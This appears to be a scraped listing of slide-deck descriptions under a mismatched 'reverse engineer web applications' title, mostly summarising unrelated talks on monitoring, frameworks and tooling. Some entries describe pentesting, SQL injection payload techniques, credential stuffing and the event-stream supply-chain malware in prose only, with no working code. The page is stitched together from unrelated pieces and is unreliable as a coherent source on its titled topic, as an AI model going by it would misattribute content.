How to Reverse Engineer Web Applications

This document discusses monitoring Apache Kafka clusters and applications with Prometheus. It provides an overview of the architecture used, including deploying Prometheus servers, Kafka and HBase exporters, and a JSON exporter for YARN applications. Specific exporters are discussed for Kafka brokers using JMX, Kafka clients using the Prometheus Java library, and exposing application metrics via HTTP. Important Prometheus configurations and query functions are also covered. The summary highlights the key components of the monitoring architecture and some of the exporters and techniques discussed.

A quick intro to using the Python micro framework Flask. Building a simple multiple page website from the ground up.

This document provides an overview of Flask, a microframework for Python. It discusses that Flask is easy to code and configure, extensible via extensions, and uses Jinja2 templating and SQLAlchemy ORM. It then provides a step-by-step guide to setting up a Flask application, including creating a virtualenv, basic routing, models, forms, templates, and views. Configuration and running the application are also covered at a high level.

This document provides an outline for a presentation on pentesting web applications with Burp Suite. It discusses using Burp Suite to scope a target, map content through spidering and directory bruteforcing, replace automated scanning with manual fuzzing using attack paylists, and test authentication through bruteforcing logins. Specific techniques covered include using the Burp spider, intruder, and engagement tools to discover content and hidden directories, importing wordlists to bruteforce hidden paths, and configuring intruder payloads and grep rules to analyze results from fuzzing and authentication testing.

https://2018.zeronights.ru/en/reports/reverse-proxies-inconsistency/ Modern websites are growing more complex with different reverse proxies and balancers covering them. They are used for various purposes: request routing, caching, putting additional headers, restricting access. In other words, reverse proxies must both parse incoming requests and modify them in a particular way. However, path parsing may turn out to be quite a challenge due to mismatches in the parsing of different web servers. Moreover, request converting may imply a wide range of different consequences from a cybersecurity point of view. I have analyzed different reverse proxies with different configurations, the ways they parse requests, apply rules, and perform caching. In this talk, I will both speak about general processes and the intricacies of proxy operation and demonstrate the examples of bypassing restrictions, expanding access to a web application, and new attacks through the web cache deception and cache poisoning.

This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan. Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd

Basics of Node.js and where it is being used currently. Some introductory examples are also included in the presentation to get started.

Docker has created enormous buzz in the last few years. Docker is a open-source software containerization platform. It provides an ability to package software into standardised units on Docker for software development. In this hands-on introductory session, I introduce the concept of containers, provide an overview of Docker, and take the participants through the steps for installing Docker. The main session involves using Docker CLI (Command Line Interface) - all the concepts such as images, managing containers, and getting useful work done is illustrated step-by-step by running commands.

This document provides an introduction to PHP, including: - What scripting languages and PHP are, and how PHP works as a server-side scripting language - The history and origins of PHP - How to set up a PHP development environment using XAMPP - PHP programming fundamentals like syntax, operators, and control structures - How to handle forms and files in PHP - How to connect to and manipulate databases like MySQL from PHP - Several tasks as examples of working with forms, files, and databases in PHP

The document discusses web application security and provides an overview of common vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF). It summarizes the OWASP Top 10 list of most critical web app security risks, including injection flaws, broken authentication, sensitive data exposure, and more. The document also offers best practices for developing more securely, like using prepared statements, validating and sanitizing input, and implementing authentication and session management properly.

Presentation from LevelUp 0x03 conference - https://forum.bugcrowd.com/t/levelup-0x03-aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs-by-0ang3el/

This is a talk on how you can monitor your microservices architecture using Prometheus and Grafana. This has easy to execute steps to get a local monitoring stack running on your local machine using docker.

This document discusses injection vulnerabilities like SQL, XML, and command injection. It provides examples of how injection occurs by mixing commands and data, including accessing unauthorized data or escalating privileges. The speaker then discusses ways to prevent injection, such as validating all user input, using prepared statements, adopting secure coding practices, and implementing web application firewalls. The key message is that applications should never trust user input and adopt defense in depth techniques to prevent injection vulnerabilities.

Nginx is an open-source, lightweight web server that can serve static files, act as a reverse proxy, load balancer, and HTTP cache. It is fast, scalable, and improves performance and security for large websites. Some key companies that use Nginx include Google, IBM, LinkedIn, and Facebook. Nginx follows a master-slave architecture with an event-driven, asynchronous, and non-blocking model. The master process manages worker processes that handle requests in a single-threaded manner, improving concurrency.

The presentation provides an overview of what are Web Services, Why we need for Web Services; Features of SOAP & RESTful Web Services.

Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.

Introduction to Ansible. This is a tutorial based ppt, that can be used while conducting a workshop at any conference.

A beginner's guide to annotation processing. In this talk that I gave at Droidcon Tel Aviv in 2016, I walk you through the process of building a custom annotation processor which mimics some of the behavior you may be familiar with from the popular Android library: Butter Knife.

This document provides a summary of creating a custom annotation processor called "Soup Ladle" that allows for view binding in Android with the @Bind annotation. It discusses defining the @Bind annotation, extending the AbstractProcessor class to process the annotation, scanning code for @Bind fields and their parent classes, and generating SoupLadle.java files with binding methods for each parent class. The goal is to allow easy one-line view binding like SoupLadle.bind(this) for learning purposes and as a simpler alternative to libraries like ButterKnife.

Practical Chaos Engineering will show how to start running chaos experiments in your infrastructure and will try to guide your through the principles of chaos.

This document discusses building APIs with Swift, OpenAPI, and gRPC. It introduces protocol buffers for defining data structures, and gRPC for building APIs. It recommends using the gnostic tool to convert OpenAPI descriptions to protocol buffers for use with gRPC plugins. This allows building high-quality code generators in different languages by separating the generator from the API description parsing. The document provides examples of building gRPC APIs and clients in Swift.

Spoon is an open-source library that enables you to transform and analyze Java source code. Due to a complete and fine-grained Java metamodel, you can read and write the AST built by Spoon. In this talk, you'll see all strong concepts and API with an example. Then, you'll see how you can integrate this project in yours.

React Native allows developers to build mobile apps using React with native platform capabilities. It uses native components instead of web views, making apps feel and perform like native ones. The document discusses what React Native is, how to set up a development environment, build a basic app, add libraries, handle common errors, and React Native fundamentals like components, styles, layout, events, and touch handling.

Front-end development has an amazing assortment of libraries and tools, yet it can seem very complex and doest seem much fun. So we'll live code a ClojureScript application (with a bit of help from Git) and show how development doesn't have to be complex or slow. Through live evaluation, we can build a reactive, functional application. Why not take a look at a well designed language that uses modern functional & reactive concepts for building Front-End apps. You are going to have to trans-pile anyway, so why not use a language, libraries and tooling that is bursting with fun to use.

- The document discusses some of the author's criticisms of Scala, including its use of implicit parameters to configure runtime behavior, and lack of good support for asynchronous programming. - The author proposes some workarounds, like annotating imports to avoid implicit conflicts, and patching the compiler to add more information to Future exceptions. However, the ideal solution would be language changes or improvements to asynchronous abstractions like Async. - Overall, the author argues that Scala is not ideal for some use cases like asynchronous programming, but provides some workarounds people can use in the meantime. The best solutions require changes to the language and standard library.

The document discusses and compares two popular ActionScript frameworks: PureMVC and Robotlegs. It provides an overview of why frameworks are used, describes some common design patterns implemented in frameworks, and highlights key features and strengths/weaknesses of PureMVC and Robotlegs.

This document discusses how to test NodeJS applications using the Mocha testing framework, the Should assertion library, and Sinon for spies/stubs/mocks. It covers setting up Mocha and Should, writing synchronous and asynchronous tests, using hooks, the Should DSL for assertions, running and configuring tests, integrating Sinon, and measuring test coverage with node-jscoverage.

This document discusses using various technologies on Google App Engine including JIQL, GaeVFS, RESTlets, scheduled tasks, JRuby on Rails, task queues, XMPP, and Clojure. JIQL emulates a relational database on App Engine's Bigtable datastore. GaeVFS provides a virtual filesystem on Bigtable. RESTlets make RESTful web services easy to implement in Java on App Engine. Scheduled tasks allow for background processing via cron jobs. JRuby on Rails provides a way to run Ruby on Rails applications on App Engine. Task queues allow for asynchronous background processing. XMPP enables instant messaging and peer-to-peer applications. Clojure can also be used

This document provides an overview of Clojurescript presented by John Stevenson. It discusses how Clojurescript provides a pragmatic approach to functional programming using immutable data structures and pure functions. It also describes how Clojurescript interfaces with popular JavaScript frameworks like React and how it can help manage complexity and state changes in web applications. Additionally, the document provides examples of Clojurescript libraries and tools and discusses ways to get started with the Clojurescript environment and ecosystem.

It’s late 2016, so you probably have been using Java 8 goodies for a while: lambdas, Stream, Optional, new date API ‒ stuff which makes Java development much more pleasant. But the question is: do you know these tools well? I bet you said yes, because writing sweet Java 8 code is piece of cake ‒ you’re using efficient, parallel streams and many lambdas, so what could possibly go wrong? Let me put this straight: most probably you’re doing something wrong. In this talk I won’t actually try to prove that you don’t know what you’re doing, on the contrary ‒ I’ll try to help you be a better programmer by pointing out few mistakes you can make when writing Java 8 code (I know that because I made them all). I’ll also discuss couple common misconceptions regarding Stream and Optional and mention missing language features (also if there is a chance to see them in Java 9 or what library should you use instead). Last but not least, I’ll present you a number of lesser-known gems I found in deepest corners of JDK API, which, I hope, will make your life as a software developer a little bit easier.

How to write CLI apps for macOS using swift, which packages to use, common challenges to overcome, how to structure your CLI app code.

Greg Anderson's slide deck from BADCamp 2016. Having a fine-tuned continuous integration environment is extremely valuable, even for small projects. Today, there is a wide variety of standalone projects and online Software-As-A-Service offerings that can super-streamline your everyday development tasks that can help you get your projects up and running like a pro. In this session, we'll look at how you can get the most out of: - GitHub source code repository - Packagist package manager for Composer - Travis CI continuous integration service - Coveralls code coverage service - Scrutinizer static analysis service - Box2 phar builder - PhpDocumentor api documentation generator - ReadTheDocs online documentation reader service - Composer scripts and projects for running local tests and builds

The document discusses the future of server-side JavaScript. It provides reasons for using JavaScript on the server, including that it is the lingua franca of the web, allows for code reuse between server and client, and supports asynchronous programming well. It also discusses JavaScript engines, CommonJS modules and packages, environments like Node.js and RingoJS, and trends like wider adoption and cloud-based IDEs.

This document provides an agenda and summary for a workshop on developing MongoDB applications on OpenShift presented by Shekhar Gulati. The agenda includes getting started with OpenShift, developing a location-aware Java EE application using JAX-RS and CDI for REST services, and MongoDB for the database. The document discusses OpenShift, JAX-RS, CDI, and MongoDB concepts. It also outlines code samples and steps to create and deploy a sample Twitter-like application on OpenShift that supports creating, finding, and geo-searching statuses.

- Server applications written in Objective-C and GNUstep can take advantage of the GNUstep base libraries and Foundation framework to provide high-level object-oriented design and functionality while maintaining high performance comparable to C. - The GNUstep base libraries provide common classes for tasks like strings, collections, threading, notifications, and I/O that allow server code to be organized using object-oriented patterns. - Objective-C is well-suited for server applications because it is a strict superset of C, allowing seamless integration of C code and libraries, while also providing object-oriented features for high-level organization of server code.

- Server applications written in Objective-C and GNUstep-base can take advantage of the high-level object-oriented features of Objective-C while maintaining the performance and flexibility of C. - GNUstep-base provides the Foundation library, which includes classes for tasks like threading, networking, data storage and more that are useful for server applications. - Objective-C allows mixing C code for performance critical parts while organizing the overall application structure using object-oriented patterns supported by the GNUstep-base libraries.

- Lithium is an upcoming PHP framework that is lightweight and flexible - It uses MongoDB as its primary database and supports MySQL as well - The presentation covered the core functionality of Lithium including installation, models, controllers, views and provided examples of using it to build a blog application

This All Things Open 2022 talk shows how to use current-gen WebAssembly to build complex applications out of components.

This talk was given at AppSec California, January 2020. Credential stuffing and other automated attacks are evolving passed every defense thrown in their way. CAPTCHAs don't work, Fingerprints don't work, Magical AI-whatevers don't work. The value is just too great.

Slides for talk given at PasswordsCon Sweden 2019. Credentials Stuffing is an automated attack that exploits users who reuse passwords by taking breached credentials and replaying them across sites.

This document summarizes an analysis of an exploited NPM package called event-stream. It describes how an attacker gained control of the package and added malicious code that was downloaded by thousands of projects whenever their dependencies were updated. The malicious code stole cryptocurrency from wallets containing large amounts. It highlights the risks of supply chain attacks and emphasizes the importance of auditing dependencies, locking versions, and thinking carefully before adding new dependencies to avoid compromising entire projects and their users.

Jarrod Overson presented on a supply chain attack that occurred in 2018 through the compromise of the event-stream Node.js package. An unauthorized developer gained commit access and introduced malicious code through new dependencies that was then installed by millions of users. The malware harvested cryptocurrency private keys from the Copay wallet app. While the community responded quickly, such attacks demonstrate vulnerabilities in open source software supply chains and dependency management that will continue to be exploited if not properly addressed through changes to practices and tooling.

Deepfakes originally started as cheap costing but believable video effects and have expanded into AI-generated content of every format. This session dove into the state of deepfakes and how the technology highlights an exciting but dangerous future.

Jarrod Overson discusses the evolution of credential stuffing attacks and where they may go in the future. He summarizes that credential stuffing started as basic automated login attempts but has evolved through generations as defenses were put in place, such as CAPTCHAs and behavior analysis. The next generation involves more sophisticated imitation attacks that flawlessly emulate human behavior using real device fingerprints to blend in. Beyond credential stuffing, malware may start scraping user accounts and environments directly from infected machines. As defenses raise the cost of attacks, fraudsters will diversify methods to preserve the value of valid accounts and user data.

OWASP RTP Presentation on Data breaches, credential spills, the lifespan of data, credential stuffing, the attack lifecycle, and what you can do to protect yourself or your users.

QCon SF 2016 security talk about who uses data from massive breaches (like Yahoo, Target), what tools they use, and what damage they inflict.

Shape Security analyzes 1.5 billion logins per week and protects 350 million user accounts. In 2016 alone, 1.6 billion credentials were leaked and sold or traded by criminals on dark web markets. Shape uses headless browsers like PhantomJS to automatically test leaked credentials on other sites, stopping over $1 billion in fraud losses in 2016. However, captchas intended to prevent automated attacks do not work and ruin the user experience.

Talk given at Mozilla's first View Source Conference in Portland, 2015. Details out the parallels between graphics and game developments compared to traditional web development.

This document discusses the dark side of web security, including automated threats from bots and attackers. It notes that traditional security like flossing is difficult to measure effectiveness. It outlines the OWASP top 10 vulnerabilities and automated threats attackers use. While captchas are meant to stop bots, services have made bypassing captchas easier. If a site has value like money, data, or content, there is value in exploiting it. Detection of attacks is difficult as attackers use many proxies and fingerprints to avoid detection. Patching is not enough, and spikes in traffic from many IPs could indicate an attack.

This was a talk given at HTML5DevConf SF in 2015. Ever wanted to write your own Browserify or Babel? Maybe have an idea for something new? This talk will get you started understanding how to use a JavaScript AST to transform and generate new code.

This document discusses ECMAScript 2015 (ES2015), also known as ES6. It provides examples of new ES2015 features like arrow functions, template literals, classes, and modules. It also discusses how to set up a development environment to use ES2015, including transpiling code to ES5 using Babel, linting with Eslint, testing with Mocha, and generating coverage reports with Istanbul. The document emphasizes that while ES2015 is fun to explore, proper tooling like linting and testing is needed for serious development. It concludes by noting ES2015 marks a transition and thanks the audience.

The document discusses achieving maintainability in code through examining code quality with linters, generating visual reports on metrics like complexity and coverage, and automating processes like builds, linting, and testing through tools like Grunt and Gulp. It emphasizes setting limits on metrics like complexity, enforcing code style through automation, and treating documentation as important as code.

1) The document discusses achieving maintainability in code through analysis, automation, and enforcement of standards. 2) It recommends setting up linting, code coverage, and other analysis tools to examine code quality and automatically enforcing code style through build processes. 3) The key is to automate as many processes as possible like testing, linting, and documentation to make the code easy to work with and prevent issues from being introduced.

Slides for the keynote given at QCon Sao Paulo 2014. Talk goes into the problems scaling Riot and how we've tried to solve them as well as what we've learned from the web and what lies in store next.